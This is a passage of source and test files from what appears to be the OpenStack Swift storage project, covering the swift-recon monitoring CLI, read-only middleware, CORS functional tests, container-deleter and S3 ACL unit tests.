[-l] [-T] [--md5] [--auditor] [--updater] [--expirer] [--sockstat]
[--human-readable]
<server_type>\taccount|container|object
Defaults to object server.
ex: %prog container -l --auditor
'''
args = optparse.OptionParser(usage)
args.add_option('--verbose', '-v', action="store_true",
help="Print verbose info")
args.add_option('--suppress', action="store_true",
help="Suppress most connection related errors")
args.add_option('--async', '-a',
action="store_true", dest="async_check",
help="Get async stats")
args.add_option('--replication', '-r', action="store_true",
help="Get replication stats")
args.add_option('--reconstruction', '-R', action="store_true",
help="Get reconstruction stats")
args.add_option('--auditor', action="store_true",
help="Get auditor stats")
args.add_option('--updater', action="store_true",
help="Get updater stats")
args.add_option('--expirer', action="store_true",
help="Get expirer stats")
args.add_option('--sharding', action="store_true",
help="Get sharding stats")
args.add_option('--unmounted', '-u', action="store_true",
help="Check cluster for unmounted devices")
args.add_option('--diskusage', '-d', action="store_true",
help="Get disk usage stats")
args.add_option('--human-readable', action="store_true",
help="Use human readable suffix for disk usage stats")
args.add_option('--loadstats', '-l', action="store_true",
help="Get cluster load average stats")
args.add_option('--quarantined', '-q', action="store_true",
help="Get cluster quarantine stats")
args.add_option('--validate-servers', action="store_true",
help="Validate servers on the ring")
args.add_option('--md5', action="store_true",
help="Get md5sum of servers ring and compare to "
"local copy")
args.add_option('--sockstat', action="store_true",
help="Get cluster socket usage stats")
args.add_option('--driveaudit', action="store_true",
help="Get drive audit error stats")
args.add_option('--time', '-T', action="store_true",
help="Check time synchronization")
args.add_option('--jitter', type="float", default=0.0,
help="Maximal allowed time jitter")
args.add_option('--swift-versions', action="store_true",
help="Check swift versions")
args.add_option('--top', type='int', metavar='COUNT', default=0,
help='Also show the top COUNT entries in rank order.')
args.add_option('--lowest', type='int', metavar='COUNT', default=0,
help='Also show the lowest COUNT entries in rank \
order.')
args.add_option('--all', action="store_true",
help="Perform all checks. Equal to \t\t\t-arRudlqT "
"--md5 --sockstat --auditor --updater --expirer "
"--driveaudit --validate-servers --swift-versions")
args.add_option('--region', type="int",
help="Only query servers in specified region")
args.add_option('--zone', '-z', type="int",
help="Only query servers in specified zone")
args.add_option('--timeout', '-t', type="int", metavar="SECONDS",
help="Time to wait for a response from a server",
default=5)
args.add_option('--swiftdir', default="/etc/swift",
help="Default = /etc/swift")
args.add_option('--policy', '-p',
help='Only query object servers in specified '
'storage policy (specified as name or index).')
options, arguments = args.parse_args()
if len(sys.argv) <= 1 or len(arguments) > len(self.check_types):
args.print_help()
sys.exit(0)
if arguments:
arguments = set(arguments)
if arguments.issubset(self.check_types):
server_types = arguments
else:
print("Invalid Server Type")
args.print_help()
sys.exit(1)
else: # default
server_types = ['object']
swift_dir = options.swiftdir
if set_swift_dir(swift_dir):
reload_storage_policies()
self.verbose = options.verbose
self.suppress_errors = options.suppress
self.timeout = options.timeout
for server_type in server_types:
self.server_type = server_type
ring_names = self._get_ring_names(options.policy)
if not ring_names:
print('Invalid Storage Policy: %s' % options.policy)
args.print_help()
sys.exit(0)
hosts = self.get_hosts(options.region, options.zone,
swift_dir, ring_names)
print("--> Starting reconnaissance on %s hosts (%s)" %
(len(hosts), self.server_type))
print("=" * 79)
if options.all:
if self.server_type == 'object':
self.async_check(hosts)
self.object_auditor_check(hosts)
self.updater_check(hosts)
self.expirer_check(hosts)
self.reconstruction_check(hosts)
elif self.server_type == 'container':
self.auditor_check(hosts)
self.updater_check(hosts)
self.sharding_check(hosts)
elif self.server_type == 'account':
self.auditor_check(hosts)
self.replication_check(hosts)
self.umount_check(hosts)
self.load_check(hosts)
self.disk_usage(hosts, options.top, options.lowest,
options.human_readable)
self.get_ringmd5(hosts, swift_dir)
self.get_swiftconfmd5(hosts)
self.quarantine_check(hosts)
self.socket_usage(hosts)
self.server_type_check(hosts)
self.driveaudit_check(hosts)
self.time_check(hosts, options.jitter)
self.version_check(hosts)
else:
if options.async_check:
if self.server_type == 'object':
self.async_check(hosts)
else:
print("Error: Can't check asyncs on non object "
"servers.")
print("=" * 79)
if options.unmounted:
self.umount_check(hosts)
if options.replication:
self.replication_check(hosts)
if options.auditor:
if self.server_type == 'object':
self.object_auditor_check(hosts)
else:
self.auditor_check(hosts)
if options.updater:
if self.server_type == 'account':
print("Error: Can't check updaters on account "
"servers.")
print("=" * 79)
else:
self.updater_check(hosts)
if options.expirer:
if self.server_type == 'object':
self.expirer_check(hosts)
else:
print("Error: Can't check expirer on non object "
"servers.")
print("=" * 79)
if options.sharding:
if self.server_type == 'container':
self.sharding_check(hosts)
else:
print("Error: Can't check sharding on non container "
"servers.")
print("=" * 79)
if options.reconstruction:
if self.server_type == 'object':
self.reconstruction_check(hosts)
else:
print("Error: Can't check reconstruction stats on "
"non object servers.")
print("=" * 79)
if options.validate_servers:
self.server_type_check(hosts)
if options.loadstats:
self.load_check(hosts)
if options.diskusage:
self.disk_usage(hosts, options.top, options.lowest,
options.human_readable)
if options.md5:
self.get_ringmd5(hosts, swift_dir)
self.get_swiftconfmd5(hosts)
if options.quarantined:
self.quarantine_check(hosts)
if options.sockstat:
self.socket_usage(hosts)
if options.driveaudit:
self.driveaudit_check(hosts)
if options.time:
self.time_check(hosts, options.jitter)
if options.swift_versions:
self.version_check(hosts)
def main():
try:
reconnoiter = SwiftRecon()
reconnoiter.main()
except KeyboardInterrupt:
print('\n')
```
#### File: common/middleware/read_only.py
```python
from swift.common.constraints import check_account_format, valid_api_version
from swift.common.swob import HTTPMethodNotAllowed, Request
from swift.common.utils import get_logger, config_true_value
from swift.common.registry import register_swift_info
from swift.proxy.controllers.base import get_info
"""
=========
Read Only
=========
The ability to make an entire cluster or individual accounts read only is
implemented as pluggable middleware. When a cluster or an account is in read
only mode, requests that would result in writes to the cluser are not allowed.
A 405 is returned on such requests. "COPY", "DELETE", "POST", and
"PUT" are the HTTP methods that are considered writes.
-------------
Configuration
-------------
All configuration is optional.
============= ======= ====================================================
Option Default Description
------------- ------- ----------------------------------------------------
read_only false Set to 'true' to put the entire cluster in read only
mode.
allow_deletes false Set to 'true' to allow deletes.
============= ======= ====================================================
---------------------------
Marking Individual Accounts
---------------------------
If a system administrator wants to mark individual accounts as read only,
he/she can set X-Account-Sysmeta-Read-Only on an account to 'true'.
If a system administrator wants to allow writes to individual accounts,
when a cluster is in read only mode, he/she can set
X-Account-Sysmeta-Read-Only on an account to 'false'.
This header will be hidden from the user, because of the gatekeeper middleware,
and can only be set using a direct client to the account nodes.
"""
class ReadOnlyMiddleware(object):
"""
Middleware that make an entire cluster or individual accounts read only.
"""
def __init__(self, app, conf, logger=None):
self.app = app
self.logger = logger or get_logger(conf, log_route='read_only')
self.read_only = config_true_value(conf.get('read_only'))
self.write_methods = {'COPY', 'POST', 'PUT'}
if not config_true_value(conf.get('allow_deletes')):
self.write_methods.add('DELETE')
def __call__(self, env, start_response):
req = Request(env)
if req.method not in self.write_methods:
return self.app(env, start_response)
try:
version, account, container, obj = req.split_path(2, 4, True)
if not valid_api_version(version):
raise ValueError
except ValueError:
return self.app(env, start_response)
if req.method == 'COPY' and 'Destination-Account' in req.headers:
dest_account = req.headers.get('Destination-Account')
account = check_account_format(req, dest_account)
if self.account_read_only(req, account):
msg = 'Writes are disabled for this account.'
return HTTPMethodNotAllowed(body=msg)(env, start_response)
return self.app(env, start_response)
def account_read_only(self, req, account):
"""
Check whether an account should be read-only.
This considers both the cluster-wide config value as well as the
per-account override in X-Account-Sysmeta-Read-Only.
"""
info = get_info(self.app, req.environ, account, swift_source='RO')
read_only = info.get('sysmeta', {}).get('read-only', '')
if not read_only:
return self.read_only
return config_true_value(read_only)
def filter_factory(global_conf, **local_conf):
"""
paste.deploy app factory for creating WSGI proxy apps.
"""
conf = global_conf.copy()
conf.update(local_conf)
if config_true_value(conf.get('read_only')):
register_swift_info('read_only')
def read_only_filter(app):
return ReadOnlyMiddleware(app, conf)
return read_only_filter
```
#### File: test/cors/main.py
```python
import argparse
import json
import os
import os.path
import sys
import threading
import time
import traceback
from six.moves import urllib
from six.moves import socketserver
from six.moves import SimpleHTTPServer
try:
import selenium.webdriver
except ImportError:
selenium = None
import swiftclient.client
DEFAULT_ENV = {
'OS_AUTH_URL': os.environ.get('ST_AUTH',
'http://localhost:8080/auth/v1.0'),
'OS_USERNAME': os.environ.get('ST_USER', 'test:tester'),
'OS_PASSWORD': os.environ.get('ST_KEY', 'testing'),
'OS_STORAGE_URL': None,
'S3_ENDPOINT': 'http://localhost:8080',
'S3_USER': 'test:tester',
'S3_KEY': 'testing',
}
ENV = {key: os.environ.get(key, default)
for key, default in DEFAULT_ENV.items()}
TEST_TIMEOUT = 120.0 # seconds
STEPS = 500
# Hack up stdlib so SimpleHTTPRequestHandler works well on py2, too
this_dir = os.path.realpath(os.path.dirname(__file__))
os.getcwd = lambda: this_dir
class CORSSiteHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def log_message(self, fmt, *args):
pass # quiet, you!
class CORSSiteServer(socketserver.TCPServer):
allow_reuse_address = True
class CORSSite(threading.Thread):
def __init__(self, bind_port=8000):
super(CORSSite, self).__init__()
self.server = None
self.bind_port = bind_port
def run(self):
self.server = CORSSiteServer(
('0.0.0.0', self.bind_port),
CORSSiteHandler)
self.server.serve_forever()
def terminate(self):
if self.server is not None:
self.server.shutdown()
self.join()
class Zeroes(object):
BUF = b'\x00' * 64 * 1024
def __init__(self, size=0):
self.pos = 0
self.size = size
def __iter__(self):
while self.pos < self.size:
chunk = self.BUF[:self.size - self.pos]
self.pos += len(chunk)
yield chunk
def __len__(self):
return self.size
def setup(args):
conn = swiftclient.client.Connection(
ENV['OS_AUTH_URL'],
ENV['OS_USERNAME'],
ENV['OS_PASSWORD'],
timeout=30) # We've seen request times as high as 7-8s in the gate
cluster_info = conn.get_capabilities()
conn.put_container('private', {
'X-Container-Read': '',
'X-Container-Meta-Access-Control-Allow-Origin': '',
})
conn.put_container('referrer-allowed', {
'X-Container-Read': '.r:%s' % args.hostname,
'X-Container-Meta-Access-Control-Allow-Origin': (
'http://%s:%d' % (args.hostname, args.port)),
})
conn.put_container('other-referrer-allowed', {
'X-Container-Read': '.r:other-host',
'X-Container-Meta-Access-Control-Allow-Origin': 'http://other-host',
})
conn.put_container('public-with-cors', {
'X-Container-Read': '.r:*,.rlistings',
'X-Container-Meta-Access-Control-Allow-Origin': '*',
})
conn.put_container('private-with-cors', {
'X-Container-Read': '',
'X-Container-Meta-Access-Control-Allow-Origin': '*',
})
conn.put_container('public-no-cors', {
'X-Container-Read': '.r:*,.rlistings',
'X-Container-Meta-Access-Control-Allow-Origin': '',
})
conn.put_container('public-segments', {
'X-Container-Read': '.r:*',
'X-Container-Meta-Access-Control-Allow-Origin': '',
})
for container in ('private', 'referrer-allowed', 'other-referrer-allowed',
'public-with-cors', 'private-with-cors',
'public-no-cors'):
conn.put_object(container, 'obj', Zeroes(1024), headers={
'X-Object-Meta-Mtime': str(time.time())})
for n in range(10):
segment_etag = conn.put_object(
'public-segments', 'seg%02d' % n, Zeroes(1024 * 1024),
headers={'Content-Type': 'application/swiftclient-segment'})
conn.put_object(
'public-with-cors', 'dlo/seg%02d' % n, Zeroes(1024 * 1024),
headers={'Content-Type': 'application/swiftclient-segment'})
conn.put_object('public-with-cors', 'dlo-with-unlistable-segments', b'',
headers={'X-Object-Manifest': 'public-segments/seg'})
conn.put_object('public-with-cors', 'dlo', b'',
headers={'X-Object-Manifest': 'public-with-cors/dlo/seg'})
if 'slo' in cluster_info:
conn.put_object('public-with-cors', 'slo', json.dumps([
{'path': 'public-segments/seg%02d' % n, 'etag': segment_etag}
for n in range(10)]), query_string='multipart-manifest=put')
if 'symlink' in cluster_info:
for tgt in ('private', 'public-with-cors', 'public-no-cors'):
conn.put_object('public-with-cors', 'symlink-to-' + tgt, b'',
headers={'X-Symlink-Target': tgt + '/obj'})
def get_results_table(browser):
result_table = browser.find_element_by_id('results')
for row in result_table.find_elements_by_xpath('./tr'):
cells = row.find_elements_by_xpath('td')
yield (
cells[0].text,
browser.name + ': ' + cells[1].text,
cells[2].text)
def run(args, url):
results = []
browsers = list(ALL_BROWSERS) if 'all' in args.browsers else args.browsers
ran_one = False
for browser_name in browsers:
kwargs = {}
try:
options = getattr(
selenium.webdriver, browser_name.title() + 'Options')()
options.headless = True
kwargs['options'] = options
except AttributeError:
# not all browser types have Options class
pass
driver = getattr(selenium.webdriver, browser_name.title())
try:
browser = driver(**kwargs)
except Exception as e:
if not ('needs to be in PATH' in str(e) or
'SafariDriver was not found' in str(e)):
traceback.print_exc()
results.append(('SKIP', browser_name, str(e).strip()))
continue
ran_one = True
try:
browser.get(url)
start = time.time()
for _ in range(STEPS):
status = browser.find_element_by_id('status').text
if status.startswith('Complete'):
results.extend(get_results_table(browser))
break
time.sleep(TEST_TIMEOUT / STEPS)
else:
try:
results.extend(get_results_table(browser))
except Exception:
pass # worth a shot
# that took a sec; give it *one last chance* to succeed
status = browser.find_element_by_id('status').text
if not status.startswith('Complete'):
results.append((
'ERROR', browser_name, 'Timed out (%s)' % status))
continue
sys.stderr.write('Tested %s in %.1fs\n' % (
browser_name, time.time() - start))
except Exception as e:
results.append(('ERROR', browser_name, str(e).strip()))
finally:
browser.close()
if args.output is not None:
fp = open(args.output, 'w')
else:
fp = sys.stdout
fp.write('1..%d\n' % len(results))
rc = 0
if not ran_one:
rc += 1 # make sure "no tests ran" translates to "failed"
for test, (status, name, details) in enumerate(results, start=1):
if status == 'PASS':
fp.write('ok %d - %s\n' % (test, name))
elif status == 'SKIP':
fp.write('ok %d - %s # skip %s\n' % (test, name, details))
else:
fp.write('not ok %d - %s\n' % (test, name))
fp.write(' %s%s\n' % (status, ':' if details else ''))
if details:
fp.write(''.join(
' ' + line + '\n'
for line in details.split('\n')))
rc += 1
if fp is not sys.stdout:
fp.close()
return rc
ALL_BROWSERS = [
'firefox',
'chrome',
'safari',
'edge',
'ie',
]
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='Set up and run CORS functional tests',
epilog='''The tests consist of three parts:
setup - Create several test containers with well-known names, set appropriate
ACLs and CORS metadata, and upload some test objects.
serve - Serve a static website on localhost which, on load, will make several
CORS requests and verify expected behavior.
run - Use Selenium to load the website, wait for and scrape the results,
and output them in TAP format.
By default, perform all three parts. You can skip some or all of the parts
with the --no-setup, --no-serve, and --no-run options.
''')
parser.add_argument('-P', '--port', type=int, default=8000)
parser.add_argument('-H', '--hostname', default='localhost')
parser.add_argument('--no-setup', action='store_true')
parser.add_argument('--no-serve', action='store_true')
parser.add_argument('--no-run', action='store_true')
parser.add_argument('-o', '--output')
parser.add_argument('browsers', nargs='*',
default='all',
choices=['all'] + ALL_BROWSERS)
args = parser.parse_args()
if not args.no_setup:
setup(args)
if args.no_serve:
site = None
else:
site = CORSSite(args.port)
should_run = not args.no_run
if should_run and not selenium:
print('Selenium not available; cannot run tests automatically')
should_run = False
if ENV['OS_STORAGE_URL'] is None:
ENV['OS_STORAGE_URL'] = swiftclient.client.get_auth(
ENV['OS_AUTH_URL'],
ENV['OS_USERNAME'],
ENV['OS_PASSWORD'],
timeout=1)[0]
url = 'http://%s:%d/#%s' % (args.hostname, args.port, '&'.join(
'%s=%s' % (urllib.parse.quote(key), urllib.parse.quote(val))
for key, val in ENV.items()))
rc = 0
if should_run:
if site:
site.start()
try:
rc = run(args, url)
finally:
if site:
site.terminate()
else:
if site:
print('Serving test at %s' % url)
try:
site.run()
except KeyboardInterrupt:
pass
exit(rc)
```
#### File: unit/cli/test_container_deleter.py
```python
import collections
import itertools
import json
import mock
import six
import unittest
from swift.cli import container_deleter
from swift.common import internal_client
from swift.common import swob
from swift.common import utils
AppCall = collections.namedtuple('AppCall', [
'method', 'path', 'query', 'headers', 'body'])
class FakeInternalClient(internal_client.InternalClient):
def __init__(self, responses):
self.resp_iter = iter(responses)
self.calls = []
def make_request(self, method, path, headers, acceptable_statuses,
body_file=None, params=None):
if body_file is None:
body = None
else:
body = body_file.read()
path, _, query = path.partition('?')
self.calls.append(AppCall(method, path, query, headers, body))
resp = next(self.resp_iter)
if isinstance(resp, Exception):
raise resp
return resp
def __enter__(self):
return self
def __exit__(self, *args):
unused_responses = [r for r in self.resp_iter]
if unused_responses:
raise Exception('Unused responses: %r' % unused_responses)
class TestContainerDeleter(unittest.TestCase):
def setUp(self):
patcher = mock.patch.object(container_deleter.time, 'time',
side_effect=itertools.count())
patcher.__enter__()
self.addCleanup(patcher.__exit__, None, None, None)
patcher = mock.patch.object(container_deleter, 'OBJECTS_PER_UPDATE', 5)
patcher.__enter__()
self.addCleanup(patcher.__exit__, None, None, None)
def test_make_delete_jobs(self):
ts = '1558463777.42739'
self.assertEqual(
container_deleter.make_delete_jobs(
'acct', 'cont', ['obj1', 'obj2'],
utils.Timestamp(ts)),
[{'name': ts + '-acct/cont/obj1',
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'},
{'name': ts + '-acct/cont/obj2',
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'}])
def test_make_delete_jobs_native_utf8(self):
ts = '1558463777.42739'
uacct = acct = u'acct-\U0001f334'
ucont = cont = u'cont-\N{SNOWMAN}'
uobj1 = obj1 = u'obj-\N{GREEK CAPITAL LETTER ALPHA}'
uobj2 = obj2 = u'/obj-\N{GREEK CAPITAL LETTER OMEGA}'
if six.PY2:
acct = acct.encode('utf8')
cont = cont.encode('utf8')
obj1 = obj1.encode('utf8')
obj2 = obj2.encode('utf8')
self.assertEqual(
container_deleter.make_delete_jobs(
acct, cont, [obj1, obj2], utils.Timestamp(ts)),
[{'name': u'%s-%s/%s/%s' % (ts, uacct, ucont, uobj1),
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'},
{'name': u'%s-%s/%s/%s' % (ts, uacct, ucont, uobj2),
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'}])
def test_make_delete_jobs_unicode_utf8(self):
ts = '1558463777.42739'
acct = u'acct-\U0001f334'
cont = u'cont-\N{SNOWMAN}'
obj1 = u'obj-\N{GREEK CAPITAL LETTER ALPHA}'
obj2 = u'obj-\N{GREEK CAPITAL LETTER OMEGA}'
self.assertEqual(
container_deleter.make_delete_jobs(
acct, cont, [obj1, obj2], utils.Timestamp(ts)),
[{'name': u'%s-%s/%s/%s' % (ts, acct, cont, obj1),
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'},
{'name': u'%s-%s/%s/%s' % (ts, acct, cont, obj2),
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'}])
def test_mark_for_deletion_empty_no_yield(self):
with FakeInternalClient([
swob.Response(json.dumps([
])),
]) as swift:
self.assertEqual(container_deleter.mark_for_deletion(
swift,
'account',
'container',
'marker',
'end',
'prefix',
timestamp=None,
yield_time=None,
), 0)
self.assertEqual(swift.calls, [
('GET', '/v1/account/container',
'format=json&marker=marker&end_marker=end&prefix=prefix',
{}, None),
])
def test_mark_for_deletion_empty_with_yield(self):
with FakeInternalClient([
swob.Response(json.dumps([
])),
]) as swift:
self.assertEqual(list(container_deleter.mark_for_deletion(
swift,
'account',
'container',
'marker',
'end',
'prefix',
timestamp=None,
yield_time=0.5,
)), [(0, None)])
self.assertEqual(swift.calls, [
('GET', '/v1/account/container',
'format=json&marker=marker&end_marker=end&prefix=prefix',
{}, None),
])
def test_mark_for_deletion_one_update_no_yield(self):
ts = '1558463777.42739'
with FakeInternalClient([
swob.Response(json.dumps([
{'name': '/obj1'},
{'name': 'obj2'},
{'name': 'obj3'},
])),
swob.Response(json.dumps([
])),
swob.Response(status=202),
]) as swift:
self.assertEqual(container_deleter.mark_for_deletion(
swift,
'account',
'container',
'',
'',
'',
timestamp=utils.Timestamp(ts),
yield_time=None,
), 3)
self.assertEqual(swift.calls, [
('GET', '/v1/account/container',
'format=json&marker=&end_marker=&prefix=', {}, None),
('GET', '/v1/account/container',
'format=json&marker=obj3&end_marker=&prefix=', {}, None),
('UPDATE', '/v1/.expiring_objects/' + ts.split('.')[0], '', {
'X-Backend-Allow-Private-Methods': 'True',
'X-Backend-Storage-Policy-Index': '0',
'X-Timestamp': ts}, mock.ANY),
])
self.assertEqual(
json.loads(swift.calls[-1].body),
container_deleter.make_delete_jobs(
'account', 'container', ['/obj1', 'obj2', 'obj3'],
utils.Timestamp(ts)
)
)
def test_mark_for_deletion_two_updates_with_yield(self):
ts = '1558463777.42739'
with FakeInternalClient([
swob.Response(json.dumps([
{'name': 'obj1'},
{'name': 'obj2'},
{'name': 'obj3'},
{'name': u'obj4-\N{SNOWMAN}'},
{'name': 'obj5'},
{'name': 'obj6'},
])),
swob.Response(status=202),
swob.Response(json.dumps([
])),
swob.Response(status=202),
]) as swift:
self.assertEqual(list(container_deleter.mark_for_deletion(
swift,
'account',
'container',
'',
'end',
'pre',
timestamp=utils.Timestamp(ts),
yield_time=0,
)), [(5, 'obj5'), (6, 'obj6'), (6, None)])
self.assertEqual(swift.calls, [
('GET', '/v1/account/container',
'format=json&marker=&end_marker=end&prefix=pre', {}, None),
('UPDATE', '/v1/.expiring_objects/' + ts.split('.')[0], '', {
'X-Backend-Allow-Private-Methods': 'True',
'X-Backend-Storage-Policy-Index': '0',
'X-Timestamp': ts}, mock.ANY),
('GET', '/v1/account/container',
'format=json&marker=obj6&end_marker=end&prefix=pre',
{}, None),
('UPDATE', '/v1/.expiring_objects/' + ts.split('.')[0], '', {
'X-Backend-Allow-Private-Methods': 'True',
'X-Backend-Storage-Policy-Index': '0',
'X-Timestamp': ts}, mock.ANY),
])
self.assertEqual(
json.loads(swift.calls[-3].body),
container_deleter.make_delete_jobs(
'account', 'container',
['obj1', 'obj2', 'obj3', u'obj4-\N{SNOWMAN}', 'obj5'],
utils.Timestamp(ts)
)
)
self.assertEqual(
json.loads(swift.calls[-1].body),
container_deleter.make_delete_jobs(
'account', 'container', ['obj6'],
utils.Timestamp(ts)
)
)
def test_init_internal_client_log_name(self):
with mock.patch(
'swift.cli.container_deleter.InternalClient') \
as mock_ic:
container_deleter.main(['a', 'c', '--request-tries', '2'])
mock_ic.assert_called_once_with(
'/etc/swift/internal-client.conf',
'Swift Container Deleter', 2,
global_conf={'log_name': 'container-deleter-ic'})
```
#### File: middleware/s3api/test_acl_utils.py
```python
import unittest
from swift.common.swob import Request
from swift.common.middleware.s3api import s3response
from swift.common.middleware.s3api.acl_utils import handle_acl_header
from test.unit.common.middleware.s3api import S3ApiTestCase
class TestS3ApiAclUtils(S3ApiTestCase):
def setUp(self):
super(TestS3ApiAclUtils, self).setUp()
def check_generated_acl_header(self, acl, expected):
req = Request.blank('/bucket',
headers={'X-Amz-Acl': acl})
try:
handle_acl_header(req)
except s3response.ErrorResponse as e:
if isinstance(e, expected):
self.assertEqual(expected._status, e._status)
else:
raise
else:
for target in expected:
self.assertTrue(target[0] in req.headers)
self.assertEqual(req.headers[target[0]], target[1])
def test_canned_acl_header(self):
# https://docs.aws.amazon.com/AmazonS3/latest/userguide/acl-overview.html#canned-acl
self.check_generated_acl_header(
'private',
[('X-Container-Read', '.'), ('X-Container-Write', '.')])
self.check_generated_acl_header(
'public-read', [('X-Container-Read', '.r:*,.rlistings')])
self.check_generated_acl_header(
'public-read-write', [('X-Container-Read', '.r:*,.rlistings'),
('X-Container-Write', '.r:*')])
self.check_generated_acl_header(
'aws-exec-read', s3response.InvalidArgument)
self.check_generated_acl_header(
'authenticated-read', s3response.S3NotImplemented)
self.check_generated_acl_header(
'bucket-owner-read', [('X-Container-Read', '.'),
('X-Container-Write', '.')])
self.check_generated_acl_header(
'bucket-owner-full-control', [('X-Container-Read', '.'),
('X-Container-Write', '.')])
self.check_generated_acl_header(
'log-delivery-write', s3response.S3NotImplemented)
# the 400 response is the catch all
self.check_generated_acl_header(
'some-non-sense', s3response.InvalidArgument)
if __name__ == '__main__':
unittest.main()
```
#### File: common/middleware/test_read_only.py
```python
import mock
import unittest
from swift.common.middleware import read_only
from swift.common.swob import Request
from test.debug_logger import debug_logger
class FakeApp(object):
def __call__(self, env, start_response):
start_response('200 OK', [])
return [b'Some Content']
def start_response(*args):
pass
read_methods = 'GET HEAD'.split()
write_methods = 'COPY DELETE POST PUT'.split()
ro_resp = [b'Writes are disabled for this account.']
class TestReadOnly(unittest.TestCase):
def test_global_read_only_off(self):
conf = {
'read_only': 'false',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={}):
for method in read_methods + write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_on(self):
conf = {
'read_only': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={}):
for method in read_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
for method in write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(ro_resp, resp)
def test_account_read_only_on(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={'sysmeta': {'read-only': 'true'}}):
for method in read_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
for method in write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(ro_resp, resp)
def test_account_read_only_off(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={'sysmeta': {'read-only': 'false'}}):
for method in read_methods + write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_on_account_off(self):
conf = {
'read_only': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={'sysmeta': {'read-only': 'false'}}):
for method in read_methods + write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_on_allow_deletes(self):
conf = {
'read_only': 'true',
'allow_deletes': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={}):
req = Request.blank('/v1/a')
req.method = "DELETE"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_account_read_only_on_allow_deletes(self):
conf = {
'allow_deletes': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={'sysmeta': {'read-only': 'on'}}):
req = Request.blank('/v1/a')
req.method = "DELETE"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_on_destination_account_off_on_copy(self):
conf = {
'read_only': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
def get_fake_read_only(*args, **kwargs):
if 'b' in args:
return {'sysmeta': {'read-only': 'false'}}
return {}
with mock.patch('swift.common.middleware.read_only.get_info',
get_fake_read_only):
headers = {'Destination-Account': 'b'}
req = Request.blank('/v1/a', headers=headers)
req.method = "COPY"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_off_destination_account_on_on_copy(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
def get_fake_read_only(*args, **kwargs):
if 'b' in args:
return {'sysmeta': {'read-only': 'true'}}
return {}
with mock.patch('swift.common.middleware.read_only.get_info',
get_fake_read_only):
headers = {'Destination-Account': 'b'}
req = Request.blank('/v1/a', headers=headers)
req.method = "COPY"
resp = ro(req.environ, start_response)
self.assertEqual(ro_resp, resp)
def test_global_read_only_off_src_acct_on_dest_acct_off_on_copy(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
def fake_account_read_only(self, req, account):
if account == 'a':
return 'on'
return ''
with mock.patch(
'swift.common.middleware.read_only.ReadOnlyMiddleware.' +
'account_read_only',
fake_account_read_only):
headers = {'Destination-Account': 'b'}
req = Request.blank('/v1/a', headers=headers)
req.method = "COPY"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_off_src_acct_on_dest_acct_on_on_copy(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch(
'swift.common.middleware.read_only.ReadOnlyMiddleware.' +
'account_read_only',
return_value='true'):
headers = {'Destination-Account': 'b'}
req = Request.blank('/v1/a', headers=headers)
req.method = "COPY"
resp = ro(req.environ, start_response)
self.assertEqual(ro_resp, resp)
def test_global_read_only_non_swift_path(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
def fake_account_read_only(self, req, account):
return 'on'
with mock.patch(
'swift.common.middleware.read_only.ReadOnlyMiddleware.' +
'account_read_only',
fake_account_read_only):
